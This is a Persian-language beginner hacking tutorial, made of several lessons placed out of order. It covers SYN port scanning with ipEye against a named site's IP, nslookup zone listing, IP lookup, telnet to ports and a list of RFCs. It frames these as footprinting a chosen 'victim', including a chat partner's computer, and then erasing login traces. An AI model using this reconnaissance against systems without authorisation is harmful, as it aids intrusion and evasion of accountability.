در تمام مطالبی که تا اين مرحله گفته‌ام سعی کرده‌ام که فقط از ابزارهای موجود در ويندوز استفاده کنم و هيچ ابزار ديگری به‌کار نبرم، اما در مبحث پورت اسکنينگ چون هيچ ابزاری در ويندوز برای اين‌ کار نيست، به‌ناچار بايد يک سری برنامه را از اينترنت داون‌لود کنيد. (توجه داشته باشيد که فعلا حرفی از لينوکس نزده‌ام و سعی می‌کنم فعلا هيچ بحثی را در مورد آن مطرح نکنم)

برای Port Scanning می‌توان از ابزارهای مختلفی استفاده کرد که اکثرا برای لينوکس طراحی شده‌اند، اما مهم‌ترين پورت اسکنرها برای ويندوز عبارتند از:

۱- نرم‌افزار NMapWin v1.3.0 :
نسخه گرافيکی و مخصوص ويندوز برای nmap است (nmap در لينوکس استفاده می‌شود). nmap از کامل‌ترين ابزارهايی است که هکر‌ها استفاده می‌کنند که علاوه بر توانايی انواع پورت اسکنينگ‌ها، می‌تواند کارهای بسياری چون تشخيص سيستم‌عامل سرور و ... را انجام دهد. اين ابزار را بعدا توضيح خواهم داد ولی فعلا برای کار ما بيش‌ از حد کامله ;-)

۲- NetScanTools Pro 2000 :
اين هم از بهترين‌هاست ولی چون پولی است به‌ جای داون‌لود بايد در CD هايی که در بازار هست پيدايش کنيد.

۳- WinScan :
برای اسکن کردن TCP (ونه UDP) می‌توانيد از آن استفاده کنيد. من زياد ازش خوشم نيومد.

۴- ipEye v1.2 :
من در این درس از اين نرم‌افزار استفاده خواهم کرد، برای داون‌لود آن می‌توانيد به سايت http://www.ntsecurity.nu/ مراجعه کنيد يا مستقيما با کليک روی اين لينک آن را داون‌لود کنيد. لازم است بگويم که اين نرم‌افزار فقط در ويندوز ۲۰۰۰ و xp کار می‌کند و نيز در يک بار اجرا فقط يک ip را می‌تواند تست کند. ضمنا فقط TCP را تست می‌کند.

 
◊ چگونه از ipEye برای پورت اسکنينگ استفاده کنيم؟

با تايپ ipEye در command prompt اين نتايج ظاهر می‌شود:

ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
          - http://ntsecurity.nu/toolbox/ipeye/
 
Error: Too few parameters.
 
Usage:
 
  ipEye   -p  [optional parameters]
  ipEye   -p 
 [optional parameters]
 
   is one of the following:
     -syn  = SYN scan
     -fin  = FIN scan
     -null = Null scan
     -xmas = Xmas scan>br>
     (note: FIN, Null and Xmas scans dont work against Windows systems.
 
  [optional parameters] are selected from the following:
     -sip   = source IP for the scan
     -sp  = source port for the scan
     -d   = delay between scanned ports in milliseconds
                         (default set to 750 ms)

فرض کنيد که می‌خواهيم سايت سازين را از نظر پورت‌ها از پورت ۱ تا ۲۰۰ تست کنيم. اول بايد ip آن را به دست بياوريم که می‌شود، 63.148.227.65 و حالا به کمک دستور زير آن را بررسی می‌کنيم:

ipeye 63.148.227.65 -syn -p 1 200

دقت کنيد که 63.148.227.65 عدد ip سازين، syn- يعنی SYN SCAN و p 1 200- يعنی تست از پورت ۱ تا ۲۰۰ باشد. البته پارامترهای ديگری را هم می‌شود ست کرد که فعلا به درد ما نمی‌خورد. با اجرای اين دستور به نتايج زير می‌رسيم:

ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
          - http://ntsecurity.nu/toolbox/ipeye/
 
  1-20 [drop]
  21 [open]
  22 [closed or reject]
  23-24 [drop]
  25 [open]
  26-52 [drop]
  53 [open]
  54-79 [drop]
  80 [open]
  81-109 [drop]
  110 [open]
  111-142 [drop]
  143 [open]
  144-200 [drop]
  201-65535 [not scanned]

Closed يعنی کامپيوتر در آن طرف هست ولی به پورت گوش نمی‌دهد، Reject يعنی اينکه يک firewall هست که اجازه اتصال به آن پورت را نمی‌دهد، Drop يعنی اينکه يک firewall همه‌چيز را پس‌ می‌زند و يا اصلا کامپيوتری اونور نيست، Open هم که يعنی باز.
در مورد سازين می‌بينيد که از بين پورت‌های ۱ تا ۲۰۰ ، پورت‌های ۲۱، ۲۵، ۵۳، ۸۰، ۱۱۰، ۱۴۳ باز است و می‌توان به‌ آنها telnet کرد. دقت کنيد که تا تمام پورت‌هايی که مشخص شده، تست نشده است، هيچ نتيجه‌ای نشان داده نمی‌شود و يه‌کم صبر می‌خواد.

جلسه ي پنجم آموزش هک

درس شماره ۶
- خلاصه درس: nslookup را بررسی می‌کنيم. پورت‌ها را تقسيم‌بندی می‌کنيم و TCP و UDP را مورد بررسی قرار می‌دهيم.
 
◊ چگونگی استفاده از nslookup

وقتی که DNS Server يک سايت را به‌دست آورده باشيم (از طريق whois )، به کمک دستور nslookup مي‌توان اطلاعاتی اضافی در مورد آن سايت پيدا کرد. طريقه استفاده اين دستور به صورت زير است:
فرض کنيد که من می‌خواهم از Domain Server سايت خودم (far30.com) اطلاعاتی به‌دست بيارم. اگر به اين سايت whois کنم، می‌بينم که دوتا Name Server يا DNS Server دارد:

s1.prdev.com
s2.prdev.com

حالا ديگر آدرس DNS Server مربوط به far30.com را دارم و می‌توانم شروع کنم:

۱- دستور nslookup را در command prompt نوشته و اجرا می‌کنم:

C:\>nslookup

و نتايج را می‌بينم:

*** Cant find server name for address 192.168.20.3: Non-exi...
*** Cant find server name for address 192.168.20.1: Non-exi...
*** Default servers are not available
Default Server:  UnKnown
Address:  192.168.20.3
 
>

علامت > يعنی شما می‌توانيد دستورات را تايپ کنيد.

۲- در جلوی علامت server s1.prdev.com

و جواب می‌شنوم:

Default Server:  s1.prdev.com
Address:  63.148.227.63

اگر در اين مرحله پيغام خطا می‌گيريد، بايد دوباره اين دستور را تايپ کنيد و نيز می‌توانيد از DNS Server دومی که در whois برای far30.com به‌دست آورديم ، استفاده کنيم.

۳- دستور زير را تايپ کنيد:

> set type=any

۴- حالا به کمک دستور زير اطلاعات را به‌دست می‌آوريم:

> ls -d  site_name .

که برای far30.com می‌شود:

>ls -d far30.com.

دقت کنيد که بعد از اسم سايت يک نقطه (dot) گذاشته‌ام، شما هم بهتر است اينطوری بنويسيد.
نتايج زير حاصل می‌شود:

[s1.prdev.com]
 far30.com.                     SOA    s1.prdev.com admin.prdev.com.
(2002070412 3600 600 86400 3600)
 far30.com.                     A      63.148.227.65
 far30.com.                     NS     s1.prdev.com
 far30.com.                     NS     s2.prdev.com
 far30.com.                     MX     10   mail.far30.com
 far30.com.                     MX     15   far30.com
 ftp                            CNAME  far30.com
 mail                           A      63.148.227.65
 www                            CNAME  far30.com
 far30.com.                     SOA    s1.prdev.com admin.prdev.com.
(2002070412 3600 600 86400 3600)
>

بعدا در مورد کاربرد تک‌تک اينها صحبت خواهم کرد ولی بعضی از آنها همين‌طوری هم اطلاعات واضحی دارند.

۵- دستور exit را مقابل < تايپ کرده و از nslookup خارج می‌شويم.

شما برای تمرين همين کار را در مورد سايت neda.net.ir انجام دهيد.

 
◊ تقسيم‌بندی پورت‌ها از روی شماره آنها

۱- پورت‌های 0 تا 1023 :
مشهورترين پورت‌ها هستند و معمولا هرکدام برای يک سرويس خاص استفاده می‌شود. با تعدادی از اين پورت‌ها در جلسات قبل آشنا شده‌ايد.

۲- پورت‌های 1024 تا 49151 :
اين سری از پورت‌ها مشخصا با هيچ‌يک از سرويس‌های اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرم‌افزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرم‌افزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار می‌کنيد، يکی از اين پورت‌ها به صورت random باز شده و يک ارتباط با سرور (با توجه به‌نوع سرويس اينترنتی که می‌دهد که يکی از پورت‌های 0 تا 1023 است) برقرار شده و داده‌ها ارسال و دريافت می‌شوند. يعنی پورت شما يکی از پورت‌های اين قسمت است و پورت سرور يکی از پورت‌های بالايی.اين سری پورت‌ها را پورت‌های register شده هم می‌گويند.

۳- پورت‌های 49152 تا 65535 :
اين سری از پورت‌ها به‌ندرت استفاده می‌شوند. کاربرد اساسی آنها برای يک سری سرويس‌های خاص اينترنتی است و يا توسط trojanها (که برای Hack کردن کامپيوتر است) است. البته خيلی از trojanهای معروف از پورت‌های رديف ۲ هم استفاده می‌کنند و اين تقسيم‌بندی‌ها هميشه برقرار نيست و به‌همين علت است که گاهی پورت‌ها را به دو‌دسته زير 1024 و بالای 1024 تقسيم‌ می‌کنند.

 
◊ TCP و UDP چيست؟

مدل TCP/IP که برای ارتباط اينترنتی به‌کار می‌رود، می‌توان به لايه‌های مختلفی تقسيم‌بندی کرد که بعدا بيشتر توضيح می‌دم، اما يکی از اين لايه‌ها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهای TCP و UDP :

۱- (TCP (Transmission Control Protocol :
اين پروتکل قوی‌تر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDP محسوب می‌شود. اين پروتکل توانايی بازبينی بسته‌هاو کنترل خطا را هم دارد.

۲- (UDP (User Datagram Protocol :
اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است.

نکته مهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرار می‌کنيم، اين ارتباط می‌تواند از نوع TCP يا UDP باشد. بنابراين وقتی می‌خواهيم يک کامپيوتر خاصی را از نظر پورت‌ها بررسی کنيم، هردو بايد بررسی شود.

درس شماره ۴

- خلاصه درس: در اين درس درباره RFC صحبت می‌کنيم.
 
◊چيست RFC ؟

متون بسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث می‌کنند. اين فايل‌ها به صورت متنی و با پسوند txt هستند و به‌عنوان مرجع (برای مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايل‌ها يک‌بار منتشر شده و هرگز تغيير داده نمی‌شوند (حتی اگر حاوی اشتباه باشند.)

 
◊ فايل‌های RFC از کجا قابل دسترسی هستند؟

RFCها از سايت‌های بسياري قابل دسترس هستند ولی سايت مورد علاقه من برای RFCها، سايت زير است:

http://www.ietf.org/rfc/xxxxxxx.txt

که به‌جای xxxxxxx نام rfc موردنظر را می‌نویسيم. مثلا برای دسترسی به rfc791 بايد آدرس را به‌ صورت زير تايپ کنيم:

http://www.ietf.org/rfc/rfc791.txt

 
◊ ليست مشهورترين RFCها:

+General Information
RFC1360 IAB Official Protocol Standards
RFC1340 Assigned Numbers
RFC1208 Glossary of Networking Terms
RFC1180 TCP/IP Tutorial
RFC1178 Choosing a Name for Your Computer
RFC1175 FYI on Where to Start:
        A Bibliography of Inter-networking Information
RFC1173 Responsibilities of Host and Network Managers:
        A Summary of the Oral Tradition of the Internet
RFC1166 Internet Numbers
RFC1127 Perspective on the Host Requirements RFCs
RFC1123 Requirements for Internet Hosts—Application and Support
RFC1122 Requirements for Internet Hosts—Communication Layers
RFC1118 Hitchhikers Guide to the Internet
RFC1011 Official Internet Protocol
RFC1009 Requirements for Internet Gateways
RFC980  Protocol Document Order Information
 
+TCP and UDP
RFC1072 TCP Extensions for Long-Delay Paths
RFC896  Congestion Control in IP/TCP Internetworks
RFC879  TCP Maximum Segment Size and Related Topics
RFC813  Window and Acknowledgment Strategy in TCP
RFC793  Transmission Control Protocol
RFC768  User Datagram Protocol
 
+IP and ICMP
RFC1219 On the Assignment of Subnet Numbers
RFC1112 Host Extensions for IP Multicasting
RFC1088 Standard for the Transmission of IP Datagrams over
        NetBIOS Networks
RFC950  Internet Standard Subnetting Procedure
RFC932  Subnetwork Addressing Schema
RFC922  Broadcasting Internet Datagrams in the Presence of Subnets
RFC9l9  Broadcasting Internet Datagrams
RFC886  Proposed Standard for Message Header Munging
RFC815  IP Datagram Reassembly Algorithms
RFC814  Names, Addresses, Ports, and Routes
RFC792  Internet Control Message Protocol
RFC791  Internet Protocol
RFC781  Specification of the Internet Protocol (IP) Timestamp Option
 
+Lower Layers
RFC1236 IP to X.121 Address Mapping for DDN
RFC1220 Point-to-Point Protocol Extensions for Bridging
RFC1209 Transmission of IP Datagrams over the SMDS Service
RFC1201 Transmitting IP Traffic over ARCNET Networks
RFC1188 Proposed Standard for the Transmission of IP Datagrams
        over FDDI Networks
RFC1172 Point-to-Point Protocol Initial Configuration Options
RFC1171 Point-to-Point Protocol for the Transmission of
        Multiprotocol Datagrams over Point-to-Point Links
RFC1149 Standard for the Transmission of IP Datagrams on Avian
        Carriers
RFC1055 Nonstandard for Transmission of IP Datagrams over
        Serial Lines: SLIP
RFC1044 Internet Protocol on Network Systems HYPERchannel:
        Protocol Specification
RFC1042 Standard for the Transmission of IP Datagrams over
        IEEE 802 Networks
RFC1027 Using ARP to Implement Transparent Subnet Gateways
RFC903  Reverse Address Resolution Protocol
RFC895  Standard for the Transmission of IP Datagrams over
        Experimental Ethernet Networks
RFC894  Standard for the Transmission of IP Datagrams over
        Ethernet Networks
RFC893  Trailer Encapsulations
RFC877  Standard for the Transmission of IP Datagrams over
        Public Data Networks
 
+Bootstrapping
RFC1084 BOOTP Vendor Information Extensions
RFC951  Bootstrap Protocol
RFC906  Bootstrap Loading Using TFTP
 
+Domain Name System
RFC1101 DNS Encoding of Network Names and Other Types
RFC1035 Domain Names—Implementation and Specification
RFC1034 Domain Names—Concepts and Facilities
RFC1033 Domain Administrators Operations Guide
RFC1032 Domain Administrators Guide
RFC974  Mail Routing and the Domain System
RFC920  Domain Requirements
RFC799  Internet Name Domains
 
+File Transfer and File Access
RFC1094 NFS: Network File System Protocol Specification
RFC1068 Background File Transfer Program (BFTP)
RFC959  File Transfer Protocol
RFC949  FTP Unique-Named Store Command
RFC783  TFTP Protocol (Revision 2)
RFC775  Directory Oriented FTP Commands
 
+Mail
RFC1341 MIME (Multipurpose Internet Mail Extensions) Mechanisms for
        Specifying and Describing the Format of Internet Message
        Bodies
RFC1143 Q Method of Implementing Telnet Option Negotiation
RFC1090 SMTP on X.25
RFC1056 PCMAIL: A Distributed Mail System for Personal Computers
RFC974  Mail Routing and the Domain System
RFC822  Standard for the Format of ARPA Internet Text Messages
RFC821  Simple Mail Transfer Protocol
 
+Routing Protocols
RFC1267 A Border Gateway Protocol 3 (BGP-3)
RFC1247 OSPF version 2
RFC1222 Advancing the NSFNET Routing Architecture
RFC1195 Use of OSI IS-IS for Routing in TCP/IP and Dual Environments
RFC1164 Application of the Border Gateway Protocol in the Internet
RFC1163 Border Gateway Protocol (BGP)
RFC1136 Administrative Domains and Routing Domains:
        A Model for Routing in the Internet
RFC1074 NSFNET Backbone SPF-Based Interior Gateway Protocol
RFC1058 Routing Information Protocol
RFC911  EGP ateway under Berkeley UNIX 4.2
RFC904  Exterior Gateway Protocol Formal Specification
RFC888  STUB Exterior Gateway Protocol
RFC827  Exterior Gateway Protocol (EGP)
RFC823  DARPA Internet Gateway
 
+Routing Performance and Policy
RFC1254 Gateway Congestion Control Survey
RFC1246 Experience with the OSPF Protocol
RFC1245 OSPF Protocol Analysis
RFC1125 Policy Requirements for Inter-Administrative Domain Routing
RFC1124 Policy Issues in Interconnecting Networks
RFC1104 Models of Policy-Based Routing
RFC1102 Policy Routing in Internet Protocols
 
+Terminal Access
RFC1205 Telnet 5250 Interface
RFC1198 FYI on the X Window System
RFC1184 Telnet Linemode Option
RFC1091 Telnet Terminal-Type Option
RFC1080 Telnet Remote Flow Control Option
RFC1079 Telnet Terminal Speed Option
RFC1073 Telnet Window Size Option
RFC1053 Telnet X.3 PAD Option
RFC1043 Telnet Data Entry Terminal Option: DODIIS Implementation
RFC1041 Telnet 3270 Regime Option
RFC1013 X Window System Protocol, version 11: Alpha Update
RFC946  Telnet Terminal Location Number Option
RFC933  Output Marking Telnet Option
RFC885  Telnet End of Record Option
RFC861  Telnet Extended Options: List Option
RFC860  Telnet Timing Mark Option
RFC859  Telnet Status Option
RFC858  Telnet Suppress Go Ahead Option
RFC857  Telnet Echo Option
RFC856  Telnet Binary Transmission
RFC855  Telnet Option Specifications
RFC854  Telnet Protocol Specification
RFC779  Telnet Send-Location Option
RFC749  Telnet SUPDUP-Output Option
RFC736  Telnet SUPDUP Option
RFC732  Telnet Data Entry Terminal Option
RFC727  Telnet Logout Option
RFC726  Remote Controlled Transmission and Echoing Telnet Option
RFC698  Telnet Extended ASCII Option
 
+Other Applications
RFC1196 Finger User Information Protocol
RFC1179 Line Printer Daemon Protocol
RFC1129 Internet Time Synchronization: The Network Time Protocol
RFC1119 Network Time Protocol (version 2) Specification
        and Implementation
RFC1057 RPC: Remote Procedure Call Protocol Specification: Version 2
RFC1014 XDR: External Data Representation Standard
RFC954  NICNAME/WHOIS
RFC868  Time Protocol
RFC867  Daytime Protocol
RFC866  Active Users
RFC865  Quote of the Day Protocol,
RFC864  Character Generator Protocol
RFC863  Discard Protocol
RFC862  Echo Protocol
 
Network Management
RFC1271 Remote Network Monitoring Management Information Base
RFC1253 OSPE version 2: Management Information Base
RFC1243 Appletalk Management Information Base
RFC1239 Reassignment of Experimental MIBs to Standard MIBs
RFC1238 CLNS MIB for Use with Connectionless Network Protocol (ISO
        8473) and End System to Intermediate System (ISO 9542)
RFC1233 Definitions of Managed Objects for the DS3 Interface Type
RFC1232 Definitions of Managed Objects for the DS1 Interface Type
RFC1231 IEEE 802.5 Token Ring MIB
RFC1230 IEEE 802.4 Token Bus MIB
RFC1229 Extensions to the Generic-Interface MIB
RFC1228 SNMP-DPI: Simple Network Management Protocol Distributed
        Program Interface
RFC1227 SNMP MUX protocol and MIB
RFC1224 Techniques for Managing Asynchronously Generated Alerts
RFC1215 Convention for Defining Traps for Use with the SNMP
RFC1214 OSI Internet Management: Management Information Base
RFC1213 Management Information Base for Network Management of
        TCP/IP-based Internets: MiB-II
RFC1212 Concise MIB Definitions
RFC1187 Bulk Table Retrieval with the SNMP
RFC1157 Simple Network Management Protocol (SNMP)
RFC1156 Management Information Base for Network Management of
        TCP/IP-based Internets
RFC1155 Structure and Identification of Management Information for
        TCP/IP-Based Internets
RFC1147 FYI on a Network Management Tool Catalog: Tools for
        Monitoring
        and Debugging TCP/IP Internets and Interconnected Devices
RFC1089 SNMP over Ethernet
 
+Tunneling
RFC1241 Scheme for an Internet Encapsulation Protocol: Version 1
RFC1234 Tunneling IPX Traffic through IP Networks
RFC1088 Standard for the Transmission of IP Datagrams over
        NetBIOS Networks
RFC1002 Protocol Standard for a NetBIOS Service on a TCP/UDP
        Transport: Detailed Specifications
RFC1001 Protocol Standard for a NetBIOS Service on a TCP/UDP
        Transport: Concepts and Methods
 
+OSI
RFC1240 OSI Connectionless Transport Services on Top of UDP:
        Version 1
RFC1237 Guidelines for OSI NSAP Allocation in the Internet
RFC1169 Explaining the Role of GOSIP
 
+Security
RFC1244 Site Security Handbook
RFC1115 Privacy Enhancement for Internet Electronic Mail:
        Part III Algorithms, Modes, and Identifiers [Draft]
RFC1114 Privacy Enhancement for Internet Electronic Mail:
        Part II Certificate-Based Key Management [Draft]
RFC1113 Privacy Enhancement for Internet Electronic Mail: Part I—
        Message Encipherment and Authentication Procedures [Draft]
RFC1108 Security Options for the Internet Protocol
 
+Miscellaneous
RFC1251 Whos Who in the Internet: Biographies of
        IAB, IESG, and IRSG Members
RFC1207 FYI on Questions and Answers: Answers to Commonly
        Asked Experienced Internet User
RFC1206 FYI on Questions and Answers: Answers to Commonly 
        sked New Internet User Questions

آموزش هک ( جلسه ي سوم )

- خلاصه درس: مسير آينده را در اين درس مشخص می‌کنم. لغاتی از ديکشنری جارگون را می‌گم. بحث Footprinting را با پيدا کردن ip سايت شروع می‌کنيم.
 

 
◊ ترسيم مسير برای آينده:

۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد ( کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملا متفاوت است.
۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) و جمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصه‌ای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد. يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آن کامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند.
۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذ دست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان می‌رسد.
۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن به يک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشته‌ايد يا نه، همينجا مشخص خواهد شد.
۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستم‌ها آمار login را نگه می‌دارند که در مورد آنها اين مرحله بسيار مهم است.

خلاصه مطالب بالا به اين صورت است:

Selection -> FootPrinting -> Penetration -> [Changings] -> Cleaning

 
 
◊ شروع مبحث Footprinting

گفتيم که اولين مرحله جمع‌آوری اطلاعات است که به آن FootPrinting می‌گويند. اين مبحث را با آموزش روش پيدا کردن ip شروع می‌کنيم.

 
◊ پيدا کردن ip يک سايت با دانستن آدرس اينترنتی

برای اين کار روشهای مختلفی هست:

۱- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعنی Status Bar پس از چند لحظه برای مدت کوتاهی ip نمايش داده می‌شود و می‌توانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است می‌توانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرم‌افزار گرافيکی بعد از باز کردن يک صفحه خالی به کمک Ctrl+V آنرا مشاهده کنيد. [ عجب راه احمقانه‌ای ;-)
اگر اين کار را برای www.yahoo.com انجام دهيم:

که همان شماره ip برای www.yahoo.com است.
نکته بسيار مهم اين است که به‌دليل ضريب اشتباه بسيار بالای آن هيچ‌گاه از اين روش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا.

۲- دستور ping را در command prompt صادر کنيد:

ping domain

در اين حالت می‌توانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده می‌کنيم). مثلا برای پيدا کردن ip سازين می‌نويسم:

ping sazin.com

و جواب می‌شنوم:

Pinging sazin.com [63.148.227.65] with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=822ms TTL=111
Reply from 63.148.227.65: bytes=32 time=811ms TTL=111

 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 811ms, Maximum =  822ms, Average =  818ms

ملاحظه می‌فرماييد که ip سازين 63.148.227.65 است.
اگر دستور ping را به‌جای sazin.com برای www.sazin.com صادر کنيد، جواب همان است. البته برای سايت‌های بزرگ جواب‌های حاصل متفاوت خواهد بود.

۳- روش بعدی و کامل‌ترين روش whois کردن به بعضی سايت‌های خاص است. بعدا اين را کامل‌تر توضيح می‌دم ولی فعلا روشش رو می‌گم. آدرس زير را در مرورگر خود تايپ کنيد:

http://www.samspade.org/t/ipwhois?a=xxxxxx

که به‌جای xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا برای sazin.com يکی از دو آدرس زير را بايد تايپ کرد:

http://www.samspade.org/t/ipwhois?a=sazin.com
http://www.samspade.org/t/ipwhois?a=www.sazin.com

چيزی که در صفحه ظاهر می‌شود به صورت زير است:

whois -h magic 63.148.227.65
sazin.com resolves to 63.148.227.65
 
Trying whois -h whois.arin.net 63.148.227.65
Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1)
                                  63.144.0.0 - 63.151.255.255
Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1)
                                  63.148.224.0 - 63.148.231.255
 
# ARIN Whois database, last updated 2002-09-04 19:05
# Enter ? for additional hints on searching ARIN"s Whois database.

که آدرس ip در سطر اول و دوم ذکر شده است.

اگر دو روش آخر را برای سايت بزرگ yahoo انجام دهيم، نتايج زير را می‌بينيم:
--> روش ping :
www.yahoo.com ====> 64.58.76.229
yahoo.com ====> 66.218.71.198
--> روش whois :
...و www.yahoo.com ====> 66.218.71.86
64.58.79.230 و yahoo.com ====> 66.218.71.198

نتايج حاصل گويای آن است که چرا بهتر است از whois استفاده کنيم

آموزش هک ( جلسه ي دوم)

درس شماره 2

- خلاصه درس: با تعريف IP و Port و کاربرد telnet آشنا می‌شويد. انواع حملات را تقسيم‌بندی می‌کنيم.
 
◊ معرفی چند اصطلاح

IP :
شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:
xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل www.yahoo.com که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا می‌گم)

پورت (Port):
در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است.
در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد:

Port Num   Service         Why its phun
--------   -------         ----------------------------------------
7          echo            Host repearts what you type
9          discard         Dev/null
11         systat          Lots of info on users
13         daytime         Time and date at computers location
15         netstat         Tremendous info on networks
19         chargen         Pours out a stream of ASCII characters.
21         ftp             Transfers files
23         telnet          Where you log in.
25         smpt            Forge email
37         time            Time
39         rlp             Resource location
43         whois           Info on hosts and networks
53         domain          Nameserver
70         gopher          Out-of-date info hunter
79         finger          Lots of info on users
80         http            Web server
110        pop             Incoming email
119        nntp            Usenet news groups -- forge posts, cancels
443        shttp           Another web server
512        biff            Mail notification
513        rlogin          Remote login
           who             Remote who and uptime
514        shell           Remote command, no password used
           syslog          Remote system logging
520        route           Routing information protocol

از ميان اين پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد.

 
◊ چگونه به يک پورت Telnet کنيم؟

برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:

  telnet hostname   portnum

در اين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد و به‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌ اسم www.iums.ac.ir مي‌نويسيد:

  telnet iums.ac.ir 13
  telnet iums.ac.ir daytime

هر دو اين دستورات معادل هم هستند.
